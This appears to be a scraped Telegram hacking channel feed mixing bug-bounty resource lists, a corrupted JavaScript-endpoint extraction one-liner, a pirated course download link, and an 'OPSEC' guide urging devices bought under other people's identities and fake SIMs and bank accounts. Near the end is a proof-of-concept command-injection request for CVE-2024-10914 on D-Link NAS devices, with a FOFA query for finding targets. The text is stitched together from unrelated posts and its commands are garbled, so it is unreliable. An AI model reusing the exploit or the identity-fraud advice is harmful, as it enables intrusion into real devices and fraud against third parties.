🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Extract all endpoints from a JS File and take your bug 🐞
✅Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt
Penetration Testing 101 Firewall Evasion
Firewall evasion allows attackers to bypass the initial barrier and potentially access sensitive information or systems within a network often by exploiting vulnerabilities or manipulating network traffic..
File password @TheGodEye
Bug Bounty on Steroids (BSides Ahemdabad 2022)
Author: @Hussein98D
Bug bounty tips
https://github.com/iamthefrogy/FYI/blob/main/Material/Bug%20Bounty%20tips%20%26%20Motivation.pdf
CENT Tool
Community edition nuclei templates, a simple tool that allows you to organize all the Nuclei templates offered by the community in one place.
📱 CENT Tool 📱
How To Protect Yourself from Ransomware (Full Guide)
Ransomware is a type of malicious software (malware) that hackers use to lock or encrypt your files or computer They demand money ( "ransom") to unlock it or give you access back. Usually, it spreads through fake emails, links,downloads or vulnerability.
Posted by @BugSpy don't share without credit.
Make me admin in your channel to get more followers !! And awesome content for free🦋
Mastering Cybersecurity: A Practical Guide for Professionals, Volume 1, 2025
Читать полностью…🔖The 4M #Methodology for Choosing the Right Bug Bounty Programs to #Hunt On: [Cross-Applying Finance to Bug Bounties]
📱 Notion: 🔗Link
"How to learn the real stories behind the exploits of hackers, intruders and fraudsters"
Читать полностью…🔖Top Hacking Books + Resources
I have compiled all the resources from this 📱 YouTube video for you (free!), and I believe they will be sufficient for anyone looking to start their journey in #cybersecurity. Special thanks to David Bombal and Jason Haddix for sharing their knowledge to help us learn in 2024!
📚Web application hacker's handbook
📚OWASP Web Security Testing Guide
📚Real World Bug Hunting
📚Bug Bounty Bootcamp
📚Red Team Field Manual v1 & v2
📚Red Team Development ...
📚Operator Handbook: Red Team...
📚Tribe of Hackers Red Team
📚The Pentester Blueprint
📚OSINT Techniques: Resources ...
📚Evading EDR
📚Attacking Network Protocols
📚Black Hat GraphQL
📚Hacking API’s
📚Black Hat Go
📚Black Hat Python
📚Black Hat Bash
📚Zseano’s methodology
📚Breaking into information security
📚Expanding your security horizons
📱 Wiki Book Pentest living document
📱 Fuzzing lists
📱 Sec Lists
📱 Payloads all the thing
s:
🖥 HackTRICKS
🖥 Web Security Testing Guide v4.2
🖥 APISEC University
🖥 Web security academy, Port Swigger
🖥 Pentester Lab
🖥 Try Hack Me: Red Team...
🖥 HTB Academy
🖥 Hacktivity
🖥 Vulnerable U
🖥 Bug Bounty Reports Explained
🖥 Sharing what matters in security
🖥 Intigriti
🖥 tl;dr sec
🖥 Unsupervised learning
🖥 Pentest Book
🖥 Bugcrowd
🖥 Trick
🟥 Joe podcast with naval ravikant must watch this Gem Podcast
❤️Share with your Mates.
⚠️ S3 Bucket Recon ⚠️
Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
https://x.com/harshleenchawl2/status/1871283856520941582?t=AzXIt_WSpgN9YEoh20uB-A&s=35
Читать полностью…Here Some Nuclei Templates which is new
https://github.com/olialkibriakonok/Nuclei-templates.git
🔍 gitlab-subdomains - A Go-based tool to uncover subdomains via GitLab searches.
🔗https://github.com/gwen001/gitlab-subdomains
How To Search For publically available exploits and use it effectively
Posted by @BugSpy
Full Networking Basics to Advanced in Simple words
Book written by - @shinchinaЧитать полностью…
Real Ethical Hacking in 43 Hours: Certificated CSEH + CEH 2024
Ethical Hacking, Pentest, Python Hacking, CEH, Metasploit, Linux , Nmap, Linux Hacking, OSCP and other awesome topics. +
21.53GB
Download : https://mega.nz/folder/4vUA3DAJ#H99PsNAR8Foaw1cGKwmTnw
#cybersecurity #ethicalhacking #ceh #metasploit #oscp #python
How to clear your tracks on window
Posted by @BugSpy (dm for any help)
35 Top Cybersecurity Tools
1. Nmap
2. Metasploit
3. Wireshark
4. Kali Linux
5. John the Ripper
6. Nikto
7. Burp Suite
8. Tor
9. Tcpdump
10. Aircrack-ng
11. Splunk
12. Acunetix
13. Snort
14. Mimecast
15. Malwarebytes
16. OpenVAS
17. SecPod SanerNow
18. UnderDefense
19. Intruder
20. ManageEngine Vulnerability Manager Plus
21. ManageEngine Log360
22. SolarWinds Security Event Manager
23. Norton Security
24. McAfee
25. AVG
26. System Mechanic Ultimate Defense
27. Vipre
28. LifeLock
29. Bitdefender Total Security
30. NordLayer
31. Perimeter 81
32. CIS
33. Webroot
34. GnuPG
35. Sparta Antivirus
Awesome Bug Bounty Tools.
• Recon:
- Subdomain Enumeration;
- Port Scanning;
- Screenshots;
- Technologies;
- Content Discovery;
- Links;
- Parameters;
- Fuzzing.
• Exploitation:
- Command Injection;
- CORS Misconfiguration;
- CRLF Injection;
- CSRF Injection;
- Directory Traversal;
- File Inclusion;
- GraphQL Injection;
- Header Injection;
- Insecure Deserialization;
- Insecure Direct Object References;
- Open Redirect;
- Race Condition;
- Request Smuggling;
- Server Side Request Forgery;
- SQL Injection;
- XSS Injection;
- XXE Injection.
• Miscellaneous:
- Passwords;
- Secrets;
- Git;
- Buckets;
- CMS;
- JSON Web Token;
- postMessage;
- Subdomain Takeover;
- Uncategorized.
Ever wondered how to craft those awesome payloads? Hmm, this is the book you need.
It will tell you how to find those awesome XSS and then how to be a master in it.
✵The Art of Disappearing Online: as Someone Is Watching you✵
Get Real VPN (Not That Free Shit)
First things first Get VPN—and not the free garbage If you’re using a free VPN you’re basically paying in privacy use
no-log VPNs like Mullvad NordVPN and express or any vpn that really gives priority to your privacy and dont leak shit and
Use Residential Rotating Proxies as Datacenter proxies are trash
Pro Tip Pay with cryptocurrency for even more anonymity
Burn Your Digital Footprint✯
Delete everything I’m talking about your cringe 2016 Facebook even that LinkedIn profile you forgot about and not using
Facebook: Deactivate it? No. Delete it. Fully.
Instagram: Burn it unless you’re using it from fake identity to watch hot reels.
Twitter: If Elon knows your thoughts, so do the feds
Bonus: use sites like AccountKiller to make nuking faster.
Use Disposable Everything (Burner emails, burner numbers, burner devices.)✯
For emails: use Tutanota, or any temp email service not gmail as Google is watching you harder than your ex😂
For numbers: use Hushed, Burner or some other cheap service If a site asks for your phone number Give them fake
Encrypted Messaging✯
Forget SMS WhatsApp, and yes, even Telegram🥲
Here’s the truth Telegram is no longer as safe as you think🥹.
It process you data now and if you’re not using secret chats
anyone with access to Telegram’s servers can see your messages.
Better Alternatives✯
Signal: End-to-end encryption, trusted by privacy nerds everywhere.
Session: No phone number required more anonymous.
Threema: ultra-private.
warning Never trust any messaging app with your life.
Encrypted doesn’t mean invincible.
start using Virtual Machines and Tails OS✯
If you’re serious about privacy:
Use a Virtual Machine (VM) for anything sensitive. Run your shady tasks in the VM and
nuke it afterward.
stat using Use Tails Os as It is extreme privacy-focused os you can get tails os or qubes os complete tutorial on my channel in my bio
Encrypt Everything
Use full-disk encryption on your laptop with
veraCrypt or BitLocker
Android users can use GrapheneOS or CalyxOS
iPhone users use latest ios
Browser Hygiene Matters alot✯😅😎😂
as you know Your browser is leaking more info than a middle school gossip. Fix it:
Don’t Use Google as google is not your friends and it still no more about you then your family
and that’s not a compliment.
Block Trackers: Install uBlock Origin and Privacy Badger.
Use Private Search Engines
better use anti detect browser
Don’t Trust Anyone Online - Not even your e-girl or your e-bro coz
when things go south, they’ll throw you under the bus faster than you can think
Use Fake Names and Passwords Like It’s a Religion✯
For every account, use a different name,
burner email, and a random password.
Why? Because one breach and your whole identity goes on sale
to the highest bidder and cracker
you can also use password managers like lastPass, Bitwarden, whatever
Burner device and phone✯
if you work is too extreme then you can buy device purchased on other people identiy
and use fåke sim fake bãnk
Go Dark When Necessary✯
When things get worst, vanish completely. Disable accounts, log off everything, and go radio silent. Silence is power.
Keep Learning✯
OPSEC is an evolving game. Stay sharp.
you can follow my channel from my bio for more tutorial and learnings
and remember trust no one, question everything, and always stay one step ahead.
What NOT to Do✯
Don’t Post Pictures With EXIF Data
Don’t Use Easy Passwords
Don’t Overshare online
Don’t Click Random Links
Don’t Get too Comfortable( moment you think you’re untouchable is the moment of downfall.)
Don’t Trust Free Stuff control you emotions as i was once hacked in 2021 using session hijacking
The best way to disappear is to never exist in the first place but if you do exist be a ghost
as the less they know, the better you sleep --The AlphaSec
Written by @BugSpy (don't share without credit it took me 30 minutes of pain to make)
Make me admin in your channel to get more followers !! And awesome content for free🦋
💎How to Install and Set Up Qubes OS for Maximum Security🕶
Qubes OS is a super-secure operating system that works by separating your activities into different virtual machines called "qubes." For example, you can keep your work, personal, and risky tasks like browsing in separate qubes, so even if one gets hacked, the others stay safe. It’s great for preventing malware or spying because each qube is isolated. You can even use disposable qubes for things like opening suspicious files, and they disappear after use. It’s powerful but needs good hardware
Posted by @BugSpy don't share without credit.
Make me admin in your channel to get more followers !! And awesome content for free🦋
cve-2024-10914
GET
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27
FOFA:app =D_Link-DNS-ShareCenter
#exploit #poc #IoT
MY ADVICE TO YOUTHS
1. Your control of your sexual urges will be the reason you are either successful or a failure.
2. Porn and masturbation is the greatest killer of success. It stunt and destroy your brain.
3. Avoid drinking alcohol like a camel drinking water. Nothing worse than losing your senses and acting a fool.
4. Keep your standards high and don't settle for something because it's available.
5. If you find someone smarter than you, work with them, don't compete.
6. No one is coming to save your problems. Your life's 100% is your responsibility.
7. You shouldn't take advice from people who are not where you want to be in life.
8. Find new ways to make money. Make money and ignore the jokers who mocks and make fun of you.
9. You don't need 100 self-help books, all you need is action and self discipline. Be disciplined!
10. Avoid drugs. Avoid weed.
11. Learn skills on YouTube not wasting your time consuming shitty content on Netflix.
12. No one cares about you. So stop being shy, go out and create your chances.
13. Comfort is the worst addiction and cheap ticket to depression.
14. Prioritize your family. Defend them even if they stink, even if they are idiots. Cover their nakedness.
15. Find new opportunities and learn from people ahead of you.
16. Trust no one. Not a single person no matter how tempted. Believe in yourself.
17. Don't wait for miracles make them happen. Yes you can't always do it alone but don't listen to the opinion of people.
18. Hardwork and determination can make you achieve anything.
Humbling yourself only takes you higher.
19. Stop waiting to discover yourself. Create YOU instead.
20. The world won't slow down for you.
21. No one owes you anything.
22. Life is a single-player game. You’re born alone. You’re going to die alone. All of your interpretations are alone. You’re gone in three generations and nobody cares. Before you showed up, nobody cared. It’s all single-player.